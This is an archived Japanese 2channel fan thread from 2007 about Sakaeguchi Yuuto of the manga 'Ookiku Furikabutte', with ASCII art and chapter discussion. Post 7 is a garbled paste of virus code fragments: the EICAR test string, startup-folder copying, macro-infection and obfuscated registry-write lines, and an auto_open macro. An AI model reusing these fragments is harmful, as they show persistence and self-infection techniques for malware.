5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【せーのおっ】おお振り 栄口勇人 パワプロ3時間【にやあっ】

1 :(;^ー^)ノシ <ハヨッ!:2007/11/20(火) 02:04:24 ID:W/RCIS4q
おおきく振りかぶって
西浦高校野球部副主将・二塁手
栄口勇人(サカエグチユウト)のスレです

次スレは>>970が立ててください。
無理な場合は>>980お願いします
スレタイ案は>>950あたりから話し合いましょう
アフタヌーン最新号のネタバレは漫画本スレと同じく発売日の0:00以降にお願いします

前スレ
【いい人】おお振り 栄口勇人 2打席目【だっ!】
http://anime2.2ch.net/test/read.cgi/cchara/1186400630/
【おお振り】おおきく振りかぶって栄口勇人スレ
http://anime2.2ch.net/test/read.cgi/cchara/1179494838/

2 :名無しかわいいよ名無し:2007/11/20(火) 02:05:36 ID:W/RCIS4q
栄口勇人(さかえぐち ゆうと)
・6月8日生まれの双子座
・0型
・169cm/54kg
・二塁手
・右投/右打
・副主将
・1年1組
・家族構成:父・姉・弟(母とは死別)
・シニア出身/阿部・篠岡と同中
・「5割じゃバントの意味ねェ!」バントの名手
(作中でバントがうまいと明言されている)
・緊張すると腹を壊す
・古典が得意で数学が苦手(?)
・ケーキは贅沢品
・パワプロ3時間

3 :名無しかわいいよ名無し:2007/11/20(火) 02:07:01 ID:W/RCIS4q
                  ,..--‐―――-..、
                   ,...:'::::::::::::::::::::::::::::::::::::`ヽ、
                 /.-‐===‐-、:::::::::::::::::::::::::ヽ
               ,..'::/: : : : : : : :`ヾヽ:::::::::::::::::::::::ヽ
  /7 /二)    ,.':::/: : : : :_:_:_:_:_:: : : ヾヽ::::::::::::::::::::::::l
 // し'´     ,'::::l: : : ;_',,=、、 ,,==、、_ゞヽ:::::::::::::::::::::::l
 l l  、_ -‐‐ァ  ヾ::::、;'ンニ‐、ヽ   '´_二ニヾ、ヽ::::::::::::::::::::l
 ヽ、)    ̄    `,':l´   o`   '´   o ヽ l.ヾ、:::::::::::::::::l
  _「l__'三'__  /:::lzZ ̄ニゝ  ‐ニ ̄Zz、 /:::::::::::::::::::::l
  └┐l´ ̄フノ  l::::l "   (       "" l::::::::::;-、::::::/
     l l      ヾ、l 、_         __,  l:::::::::::、ノ::;イ
     l_l         ヽ、 ` ー-‐' ´ ̄  ∧::::::::::::; '
     _」`L___  、 、ヽ        '´   ̄/´
    `─コ Lニ_´    ヽヽ`ー-┬ ' ´       l
  / ,' ,'´l レノヽヽ  7 ̄7ヽ、  ',  , , -‐―┴¬ __
 /   ヽ、ー',ィ」 ノノ __ ´ ̄/ ̄l7ゞ,'´ -―ニ二三`ヽ
   /   ̄   r'ニ-‐7ノ _/ーィl彡" ――‐--、 ゙ニ==ヽ
    _  く , '    ´  ∨ '´          ヽ    ヽ


4 :名無しかわいいよ名無し:2007/11/20(火) 02:23:57 ID:m1oPOUt3
>>1乙〜!
やはりにやあっになったか
>>3の栄口はいつみてもムカつくなw


5 :名無しかわいいよ名無し:2007/11/20(火) 03:19:04 ID:0WbxoNlQ
>>1乙!


前スレの954の画像を見たけど
ゲームではプロテインの話があるのかな?
アニメでは削られた部分だし、楽しみが増したー

6 :名無しかわいいよ名無し:2007/11/20(火) 03:36:35 ID:4Ruacnke
>>1乙〜


7 :名無しかわいいよ名無し:2007/11/20(火) 06:14:01 ID:6SrseIpf
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :名無しかわいいよ名無し:2007/11/20(火) 08:12:04 ID:zuqd/c4Q
>>1乙〜
やっぱり単独スレたつと嬉しいな〜

9 :名無しかわいいよ名無し:2007/11/20(火) 14:58:14 ID:nmvhznWs
                                  ___
                           , -=‐<´::ri::::::::::`ヽ、
                        /:.:.:.:.:.:.:.ヽヽ,「l::::::::::::::ヽ.
                           /:.:.:.:., -‐‐-、ゝヽ::::::::::::::::ヽ
                       '、:.:.:,'‐-、   -‐ヽゝ、::::::::::ノ
                         `,rl'´o゙  "o`ヽ '',,-ミ、'、
   _,、-‐,‐=,‐,=,ー--、_,、__,、__        i l ーノ   ―'〃 i"j )゙
 /´>',´-‐ニ´'´ ̄ ,,-=ゞ、ヾ、`ヽ_      `、 r===‐┐ ,、'_,ィ'゙   >>1乙!
"〃メ´/´ _ ,-‐'´ , - '_´, ゝ、_jr<!l `ヽ、     ヽ',____ノ /   l
  `ーy'、,'´,-',-‐'´ ,/ _ ,iュマ'゙'‐'ヒ!_   ` ‐ 、   ヽニィニ´,   l
   ゞ,/'´ _, = '´_,-‐'´'", '´ ,、rヲ" `ヽ、    `"´‐- 、‐-`ヾ゙`ヽ、
    ヾ、'´  / ,-‐',,´ ,、r,「'´     `ヽ、       `ヽ、ヽ::::::゙ヽ、
        `ゞ´ / =''" /"´          )ヽ、     ` `ヾ:::.ヽ:::ヽ、_
        `ー===-'"             /:::::::〉`iヽ,、__ 、   ノ::::::l::::::::::`..‐、
                        /:::::::/:::::く:::::::::: ̄ ̄/:::::::::l:::l:::::::::〉:::L_
                        l:::::::::\:::::::::ー, -‐':::::::::::::::l::l:::::::/::::::〉 `ヽ、
                            l::::::::::::::::`<:::::::::::::::::::::::::::/::::::::::::::/    /
                          l:::::::::::::::::::::::::ヽ::::::::::::::::::::/`ヽ-/   /
                         l:::::::::::::::::::::::::::::::::::::::::::::/   /   /
                              l::::::::::::::::::::::::::::::::::::::::::/ /   /
                             l::::::::::::::::::::::::::::::::::::::://  ,  '
                            l:::::::::::::::::::::::::::::::::::::/  , '
                             l:::::::::::::::::::::::::::::::::::::l /
                             /::::::::::::::::::::::::::::::::::::::〉
                         /:::::::::::::::::::::::::::::::::::::::::ヽ
                           /:::::::::::::::::::::_,ィ______ヽ
                       〈:::::::;ィ ' ´  __」--┴、 /"」
                           ゙-イ'"`ー‐'´ ===。=` " l
                          /´              l
                           /                    l

10 :名無しかわいいよ名無し:2007/11/20(火) 15:35:56 ID:mIx7SsmV
>>1 乙!

>>9 このシーンのAAあったんだ。もうすぐ単行本で見れるね。楽しみ。

11 :名無しかわいいよ名無し:2007/11/20(火) 20:17:02 ID:EmFu9kNA
>>9
初めて見た、すごいなぁ

12 :名無しかわいいよ名無し:2007/11/20(火) 23:11:02 ID:1D40fJ2U
おっつ
>>9
可愛いな

13 :名無しかわいいよ名無し:2007/11/21(水) 02:21:58 ID:AafoTtMi
 994  名無しかわいいよ名無し [sage] 2007/11/21(水) 00:24:54 ID:jbeFqTyB NewRes!


作ったはいいけど使いどころがわからないのでせめて梅で
     |           ガ      |
     |           シ ガ |
     |           ,,, ュ シ |
     | ,....-‐'´ ̄`ヾ、_"'',,. ュ|
     |'´、       /::ヽ''   |
     |ヽ 、     ,':::::::::\  |
     |: :ヽ、__r‐-,-┴、:::::::::::::〉 |
     |: : : ヽ |ーイ     `ーく´ヽ|
     |: : : : :ヽヽ ヽ.ミ   / /|
     |ヽ: : : : :ヽヽ ミ,「!´/  |
     | ヽ: : : : :ヽ,ゝし'´ニニヽ.|/ /
     |  ヽ: : : : lーi┴'‐---‐'/ /
     |    l: : : :l `ー---‐/ /
     |==┐l: : : :lヽ、... .....:/ /_
     |―‐‐'、l: : : :l ,'::::...// /   ̄
     |    l: : : :l ..:/ / /ヽ、
 ―、 , ――――――(__/ /:::::::::l
    |   ‐ ‐ ‐ ‐ ‐ ‐ ‐ ‐! `ヽ、:::::l
   │  トイレ   栄「"ヽ、 `ー'
.     |  ‐ ‐ ‐ ‐ ‐ ‐ ‐ ‐ ::::ヽ、


職人に感動した!

14 :名無しかわいいよ名無し:2007/11/21(水) 02:32:15 ID:C9mi8zyO
>>1ゲンミツに乙!

>>13
シガポ目線なのもスゲー

15 :名無しかわいいよ名無し:2007/11/21(水) 07:38:43 ID:54SyO/Ji
栄口のAAが増えて嬉しいなぁ 職人GJ!

16 :名無しかわいいよ名無し:2007/11/21(水) 19:45:47 ID:lUjlaM6R
AA職人の人、乙です。
ほんとすごいよね!AA!
頭悪い自分にはつくれないんだけど、いつもありがとう!

17 :名無しかわいいよ名無し:2007/11/21(水) 20:01:06 ID:nY88m4QL
>>1乙ー!
ついに3スレ目かあ
アフタももう少しだし楽しみだ!

18 :名無しかわいいよ名無し:2007/11/21(水) 21:24:50 ID:oy3rWxBj
ここ来るたび【にやあっ】が【にゃあっ】に見え(ry
栄口のAA増えて嬉しい

今月アフタって早いのか?

19 :名無しかわいいよ名無し:2007/11/21(水) 23:27:36 ID:2uLSTCsh
早いよ。したらばのバレスレにはもう本バレがきてるって。
いちおう正式発売は一日繰り上がった24日(土)だよ。

20 :名無しかわいいよ名無し:2007/11/22(木) 17:35:07 ID:GZIzA9mp
>>18
俺もにゃあに見えて非常に萌(ry

21 :名無しかわいいよ名無し:2007/11/22(木) 20:50:49 ID:BFLfr/Ue
漫画早く読める地域の人はいいなー

>>20
ちょ、想像してしまったじゃないかw

22 :名無しかわいいよ名無し:2007/11/23(金) 08:25:32 ID:C37ITAlS
>>19
サンキュ!いい人だっ
明日になれば読めるのか〜!

>>20
にゃあも可愛いんだろうけど、
栄口はかっこいいやつだぜー!って煩悩振り払ってるw

>>21
関東から遠いところに住んでるのか?

23 :名無しかわいいよ名無し:2007/11/23(金) 17:19:12 ID:d9WeJ80a
ううん、関東。早売りGET出来る人はうらやましいなぁって。
でもいよいよ明日だからwktk
栄口が少しでも出てるといいな。

24 :名無しかわいいよ名無し:2007/11/24(土) 00:25:44 ID:bBgRu5GV
正式発売日の0時まわったので
(一応改行)











泉かっこいい!!
このスレ的には、くっそー!!って感想もありですかね。
打って欲しかったなぁ。
栄口どんまい!
守りがんばれ。
西浦がんばれ。


25 :名無しかわいいよ名無し:2007/11/24(土) 00:48:06 ID:4n3nB8R+
栄口登場の1コマ目が何か可愛かった。等身低い?

26 :名無しかわいいよ名無し:2007/11/24(土) 10:47:27 ID:8DC9Ov+v
栄口はバストアップのカットだと異常にでかい時あるけど
ロングで小さいサイズで描かれるとたまに縮んでる気がする

27 :名無しかわいいよ名無し:2007/11/24(土) 17:12:56 ID:ZLAXOzR+
先月の活躍振りが本当に素晴らしかったので
今月あっさり打ち取られちゃってしょんぼり…
栄口なら落ちずに良い守備見せてくれるってしんじてる!!

28 :名無しかわいいよ名無し:2007/11/24(土) 18:21:21 ID:fVrMGuXW
今月、栄口は残念だったなー。
来月の守備に期待。その前に9巻だね。そしてDSゲーム。
アニメで削られたエピの補完もそれなりにありそうだし、
楽しみだ。

29 :名無しかわいいよ名無し:2007/11/25(日) 04:41:16 ID:TEY7p1FX
先々月(ふんっ)、先月(にやあっ)と見せ場あったから仕方ないけど
せめて内野ゴロとかねらい球絞って粘るとかやって欲しかった
来月に期待

初打席で緊張する先生を励ます役とかないかなと期待してたけど
コーチャー入ってたみたいだしどっちにしろ無理だった

30 :名無しかわいいよ名無し:2007/11/25(日) 04:58:57 ID:ehVXErBy
バッターで活躍できなくても、
声掛けとかいろんなところで活躍してるんだぜ、きっと。

31 :名無しかわいいよ名無し:2007/11/25(日) 12:11:40 ID:QM0UaTv3
>>29
いい場面で三球三振だしな。
もう少し粘りが欲しかった。


32 :名無しかわいいよ名無し:2007/11/25(日) 14:37:00 ID:JX/zm6OU
確かに。
なんだかもやもやする。
あと、あの場面の栄口の心理描写も欲しかったと思うのは贅沢なのか…
どのような心境で打席に立ってたか気になるんだ


33 :名無しかわいいよ名無し:2007/11/26(月) 01:55:54 ID:86lrbQh8
もう打席はまわってこないっぽいね
でも美丞戦はけっこう活躍したよね

34 :名無しかわいいよ名無し:2007/11/26(月) 21:26:40 ID:pDB/8Nfh
守備も見せ場あったし、この試合で打率もあがったと思うよー。
以前は成績が悪いわけじゃないけど、バント職人ゆえの打率って
感じだったけど、今回2ヒット打ったもんね!

35 :名無しかわいいよ名無し:2007/11/28(水) 00:56:25 ID:5VSpGmf7
打ちたい気持ちがあっても職人に徹してる栄口だからこそ
ヒットを打ってくれると嬉しく感じるね
もちろんバントきめてる姿もかっこいいんだけど

36 :名無しかわいいよ名無し:2007/11/28(水) 19:36:44 ID:FV2eixGZ
「はじめっから打つ気がない奴はすっこんでろ」って
ひぐちなりに怒られてるように感じた
(日本語とし成り立ってないけどこれが一番近かった…)

37 :名無しかわいいよ名無し:2007/11/28(水) 20:12:35 ID:4Nn04mwz
今月は栄口のモノローグがなかったから
前打席と同じ作戦に出たのかどうなのか、よくわからなかった
単に鹿島が乗っちゃってただけにも見える
どちらにしろ栄口は速球には強くないんだろうな

38 :名無しかわいいよ名無し:2007/11/28(水) 21:35:25 ID:71FmfCtn
モノローグ少しでいいから欲しかったね
本調子の鹿島を打てなかったのは仕方ないとしても
頭のいい(小技的意味で)栄口が2度同じ作戦に出るかな?と思った
少なくても1球目が入った時点で切り替えるんじゃないか
ごり押しで一発出した泉と対比っぽいのは興味深かったけど

39 :名無しかわいいよ名無し:2007/11/28(水) 21:38:52 ID:/24DZ7Oj
>>37
確かにバントしてた時は怖そうな顔してたよね

40 :名無しかわいいよ名無し:2007/11/29(木) 12:29:10 ID:mq0lPg04
同じ作戦ではいかないっしょ…

41 :作者の都合により名無しです:2007/11/30(金) 00:32:25 ID:hgvs/f2/
「セカイさん」がほのぼのしてて好き。

42 :名無しかわいいよ名無し:2007/11/30(金) 06:01:37 ID:82YvVNJE
>>26で思ったけど
栄口が前より体格良くなってるように見えるときあるよね
読み返すとコマによっては阿部より大きく見えたり
巣山と並んでもそんなに体格差を感じなくなってる

43 :名無しかわいいよ名無し:2007/11/30(金) 13:39:48 ID:uo3SE3PB
正直、アサ神に時間がないんだろうとは思うんだが
ほんとに体格良くなってきてるんなら嬉しいな。
重い球がっつりセンター返しの日は近づいてきているのか。
ゲリもしなくなるといいな。

44 :名無しかわいいよ名無し:2007/11/30(金) 15:28:13 ID:T+WipRQY
ゲリはしんどいけど
ゲリしない勇人なんて勇人じゃない…

45 :名無しかわいいよ名無し:2007/11/30(金) 17:57:24 ID:V4bauPpS
>>40
今月号、栄口のモノローグないから
同じ作戦だったのかどうかもわからないんだよね

匠が「打つ気のない奴はすっこんでろ」みたいな事言ってたから
個人的には同じ作戦だったのかなとも思ったけど
そこまで頭の回転悪くなさそうだし

46 :名無しかわいいよ名無し:2007/11/30(金) 18:13:23 ID:lM/2l80+
純粋に質問したいんだけど
緊張すると下痢する人間ってのは
例えば初デートや初セックルの時も緊張で下痢するものなのかね
そうだったら可哀想だ

47 :名無しかわいいよ名無し:2007/11/30(金) 18:37:38 ID:mES8fiOo
>>46
しかも栄口はチャンスの時の方がドキドキするタイプだからな。
いざって時になって腹が鳴り出して非常事態、なんていうことも
ありえそうだ。


ふと、デートの時にも「サードランナー!」と遠くを見つめる栄口を
想像した。……可愛い奴めwwww

48 :名無しかわいいよ名無し:2007/11/30(金) 19:57:14 ID:YjqF87bg
>>45
私は匠は栄口が同じ作戦か関係なく怒って「すっこんでろ」ってビシバシ決めてきたんだと思った
まあ結局同じ作戦で行ったかは分からないんだけどさ
あそこは「怒られちゃった」ってわろたよw

49 :名無しかわいいよ名無し:2007/11/30(金) 20:14:46 ID:KDvfT2dQ
前の回で、まんまと引っかかってしてやられたから
匠からすればくそこのやろう、今回は容赦しないぜ!
って感じで、栄口がどうでようと今回は絶対討ち取るのに
燃えてただろうしね。

50 :名無しかわいいよ名無し:2007/11/30(金) 20:51:17 ID:xzaVGxFT
栄口って本屋行っても腹痛くなるタイプかなぁ

51 :名無しかわいいよ名無し:2007/11/30(金) 20:52:41 ID:lM/2l80+
インクの匂いでウンコしたくなるんだっけ
不思議だなあ

52 :名無しかわいいよ名無し:2007/11/30(金) 21:39:50 ID:Efgq+iUF
だから合宿の時にトイレ掃除担当だったのか?

下痢の話題は抽選会→入試のエピソードの順で出てたから
伏線だったんだね。

53 :名無しかわいいよ名無し:2007/12/01(土) 01:28:53 ID:O4v5uN+q
>>51
そういう話だよね。
俺もそうなんだけどね。 しかもとある1店舗限定で。
不思議だよなぁ 本屋なんて他に幾らでもあんのに、その店行くとほぼ必ず腹痛くなる。 一種の脅迫観念かな?w

>>52
自分が真っ先にお世話になるかも知れない(なる可能性が高い)場所だから、
汚いのは嫌だなぁって想いが栄口をあそこへ導いたのかなw

54 :名無しかわいいよ名無し:2007/12/02(日) 01:11:48 ID:FqOSH+pF
大会終わったら栄口のウンコネタはまた復活するのかな
(作品内時間で)半年後くらいにまたトイレに立てこもって
「そういえばこいつウンコキャラだったwww」というのも個人的にはあり

55 :名無しかわいいよ名無し:2007/12/02(日) 06:29:56 ID:pp4EadTw
ところでずっと気になってることがあるんだ
3巻のおまけで合宿所のトイレはボッ○ンだって書いてあるけど
栄口が洗ってるのは洋式トイレだよね?
どっちが合ってるんだろう
どっちにしてもガシュガシュ洗う栄口が男前なことに変わりはないけど

56 :名無しかわいいよ名無し:2007/12/02(日) 09:53:46 ID:rxbvrJGU
>>55
洋式でも○ットンタイプはある。我が家にあるのがまさにそれ。
手前にレバーを引いたら水が溜まって、レバーを押したら水と一緒に流れる感じ。
分かりにくかったらごめんなー

57 :名無しかわいいよ名無し:2007/12/02(日) 10:29:39 ID:pp4EadTw
>>56
そんなタイプのトイレがあるのか!!
ボット○=和式と思いこんでたよ!ありがとー

結論:栄口は素晴らしい仕事人

58 :名無しかわいいよ名無し:2007/12/02(日) 11:08:52 ID:FswvGYG5
世界の栄口くん(・∀・)

59 :名無しかわいいよ名無し:2007/12/02(日) 16:15:59 ID:rxbvrJGU
このネタでは散々揉めてきているので>>57はスルーで

60 :名無しかわいいよ名無し:2007/12/02(日) 18:36:21 ID:6QjgsnkT
>>59
意味分らん。

61 :名無しかわいいよ名無し:2007/12/02(日) 18:42:04 ID:YlettIiY
>>60
多分>>59は57と58を書き間違えてたんだと思う。

62 :名無しかわいいよ名無し:2007/12/02(日) 20:01:08 ID:lT3ijPQN
単行本9巻が待ちきれず、今日久しぶりにアフタ切抜きを
引っ張り出して崎玉戦の頃の話を読んでたんだけど、
やっぱり>>9のAAの場面でつい感動しちゃうなー。
新刊出たらあのシーンでみんな栄口に惚れ直すといいよ。

63 :名無しかわいいよ名無し:2007/12/02(日) 20:48:15 ID:0sqpRMfk
アフタの切り抜きは持ってるけど、単行本は楽しみ。
オマケ漫画とかに栄口でてこないかなー。

64 :名無しかわいいよ名無し:2007/12/02(日) 21:08:23 ID:+xigVIGG
>>62
あの栄口は最高だよな。マジ惚れ直すよ。

65 :名無しかわいいよ名無し:2007/12/02(日) 22:04:02 ID:qmW37Mfi
「さかえぐち」よりどうしても「さかぐち」と読んめてしまう

66 :名無しかわいいよ名無し:2007/12/03(月) 11:05:43 ID:BPclbBjC
>>65
あるあるww
最初さかぐちかと思ってた
名前も「ゆうと」より「はやと」って読む方が自然みたいだし

9巻も楽しみだけどDVDの7巻も楽しみ
確か18話が入るんだよね

67 :名無しかわいいよ名無し:2007/12/03(月) 18:40:42 ID:uU1ngnui
さかぐちはやと
でも案外いける

68 :名無しかわいいよ名無し:2007/12/03(月) 20:11:47 ID:mk8HZh8m
今月号やっと読んだ
扱い悪すぎorz

69 :名無しかわいいよ名無し:2007/12/03(月) 20:37:52 ID:j5/vjM4v
やっぱゆうとのほうがいいよ。発音がやわらかくて好きだ。
はやともかっこいーけどね。

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)